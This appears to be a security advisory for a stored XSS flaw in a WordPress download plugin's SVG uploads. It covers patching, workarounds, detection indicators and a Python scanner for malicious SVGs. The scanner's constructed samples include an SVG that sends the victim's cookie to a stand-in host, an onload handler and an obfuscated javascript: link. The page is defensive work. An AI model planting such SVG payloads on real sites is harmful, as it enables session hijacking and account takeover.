CVE-2024-8673
📋 TL;DR
The Z-Downloads WordPress plugin before version 1.11.7 does not properly validate uploaded SVG files, so a user with upload access can store an SVG file containing JavaScript on the site. Because the file is served back from the site's own origin, this is a stored cross-site scripting (XSS) vulnerability affecting every WordPress site running a vulnerable version of the plugin.
💻 Affected Systems
- Z-Downloads WordPress Plugin, versions before 1.11.7
📦 What is this software?
Z Downloads by Urbanbase
⚠️ Risk & Real-World Impact
Worst Case
An attacker could upload a malicious SVG file that executes JavaScript in the browser of anyone who opens it on the site, leading to session hijacking, credential theft, or complete site takeover if an administrator is tricked into opening the file while logged in.
Likely Case
Attackers upload SVG files carrying JavaScript (script elements, event-handler attributes, or javascript: URLs) that runs when a victim opens the file directly in the browser. Note that an SVG referenced from an <img> tag is rendered without script execution; the payload fires when the file URL is navigated to or embedded as a document, so attacks depend on luring users to the file or to a page that embeds it that way.
If Mitigated
With SVG uploads blocked and a Content Security Policy applied to the responses that serve uploaded files, the impact is limited to file storage abuse, with no script execution in victims' browsers.
🎯 Exploit Status
Exploitation requires file upload access through the plugin, which typically requires at least Contributor-level permissions in WordPress. No public exploit code is referenced on this page.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.11.7
Vendor Advisory: https://wpscan.com/vulnerability/fed2cd26-7ccb-419d-b589-978410953bf4/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Z-Downloads plugin.
4. Click 'Update Now' if an update is available.
5. If no update is offered, download version 1.11.7 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Disable SVG Uploads
Add a WordPress filter to remove SVG from the allowed upload MIME types.
Add to the theme's functions.php or a small custom plugin: add_filter('upload_mimes', function($mimes) { unset($mimes['svg'], $mimes['svgz']); return $mimes; });
WordPress core does not allow SVG uploads by default, so if 'svg' is present in this list another plugin or theme added it. This filter only covers uploads that go through the core media handler; confirm that the plugin's own upload path honors it before relying on it.
Restrict File Upload Permissions
Limit file upload capabilities to trusted users only.
Use a WordPress role management plugin or custom code to restrict the 'upload_files' capability to administrators, and review which roles the Z-Downloads plugin itself allows to upload.
🧯 If You Can't Patch
- Temporarily disable the Z-Downloads plugin until patched
- Apply a Content Security Policy (CSP) to the responses that serve uploaded files (for example a web server rule for wp-content/uploads sending Content-Security-Policy: script-src 'none' or sandbox). A CSP set only on the site's HTML pages does not apply to an SVG opened as its own document. Alternatively, serve uploaded SVG files with Content-Disposition: attachment so browsers download rather than render them.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins → Z-Downloads version. If version is below 1.11.7, you are vulnerable.
Check Version:
wp plugin list --name=z-downloads --field=version
Verify Fix Applied:
After updating, verify Z-Downloads plugin shows version 1.11.7 or higher in WordPress admin panel.
📡 Detection & Monitoring
Log Indicators:
- Multiple SVG file uploads from a single user, especially a Contributor or Author account
- Uploaded SVG files containing <script> elements, on* event-handler attributes (onload, onclick, ...), or javascript: URLs in href/xlink:href attributes
- Repeated failed SVG upload attempts
Network Indicators:
- POST requests to /wp-admin/async-upload.php with SVG files
- SVG files containing JavaScript being served
SIEM Query:
source="wordpress.log" AND (("uploaded file" AND ".svg") OR ("SVG" AND "script"))
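Log and SIEM indicators tell you that an SVG was uploaded, not whether it carries active content. The scanner below is example code added to this page (it is not part of Z-Downloads, WordPress, or the WPScan advisory) that inspects SVG files for the constructs behind this class of stored XSS: script elements, on* event-handler attributes, javascript: and data:text/html URLs in any attribute, and foreignObject elements that embed HTML. It parses the XML rather than grepping it, so character-reference obfuscation such as &#106;avascript: is decoded before matching, and it falls back to a text search for files that are not well-formed XML. The sample SVG documents are constructed for this example; the uploads directory path is whatever you pass on the command line.

```python
"""Scan SVG files for active content that executes when a browser renders the
file as a top-level document. Example code for this advisory page; it is not
part of Z-Downloads or WordPress."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Elements that run code or embed arbitrary HTML inside an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignObject", "handler"}
# URL schemes that execute script or render attacker HTML when navigated.
JS_SCHEME = re.compile(r"^\s*javascript\s*:", re.IGNORECASE)
HTML_DATA_URL = re.compile(r"^\s*data\s*:\s*text/html", re.IGNORECASE)


def _local_name(qualified: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]


def scan_svg_bytes(data: bytes) -> List[str]:
    """Return a list of human-readable findings; an empty list means clean."""
    findings: List[str] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        # Not well-formed XML. Browsers refuse to render such an SVG as a
        # document, but a text search still shows what the uploader attempted.
        text = data.decode("utf-8", errors="replace")
        if re.search(r"<\s*script\b", text, re.IGNORECASE):
            findings.append("unparseable XML containing <script>")
        if re.search(r"\son\w+\s*=", text, re.IGNORECASE):
            findings.append("unparseable XML containing on* event handler")
        return findings

    for elem in root.iter():
        name = _local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            attr_name = _local_name(attr)
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler attribute {attr_name} on <{name}>")
            # Check every attribute value, not only href: an <animate
            # attributeName="href" values="javascript:..."> element smuggles
            # the URL through a different attribute.
            if JS_SCHEME.match(value) or HTML_DATA_URL.match(value):
                findings.append(f"{attr_name}={value.strip()[:40]!r} on <{name}>")
    return findings


def scan_directory(root: Path) -> Dict[str, List[str]]:
    """Map each .svg file under root that has findings to its findings."""
    report: Dict[str, List[str]] = {}
    for path in root.rglob("*.svg"):
        found = scan_svg_bytes(path.read_bytes())
        if found:
            report[str(path)] = found
    return report


# Constructed sample documents (not taken from any real upload).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""

SCRIPT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <script>fetch('https://example.invalid/?c=' + document.cookie)</script>
</svg>"""

# Root-element onload handler plus a character-reference-obfuscated javascript:
# link; the parser decodes &#106; to 'j' before the scheme check runs.
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <a xlink:href="&#106;avascript:alert(document.domain)"><text y="10">click</text></a>
</svg>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python svg_scan.py /var/www/html/wp-content/uploads
        for path, found in scan_directory(Path(sys.argv[1])).items():
            print(path)
            for item in found:
                print("   ", item)
    else:
        for label, blob in (("benign", BENIGN_SVG), ("script", SCRIPT_SVG),
                            ("handler", HANDLER_SVG)):
            print(label, scan_svg_bytes(blob))
```

Run it against the site's uploads directory after blocking further SVG uploads; any file it flags should be removed or quarantined, because the version update closes the upload hole but does not clean up files already stored. The scanner uses the standard library XML parser on untrusted input, so run it with a file size limit if the uploads directory is large or untrusted.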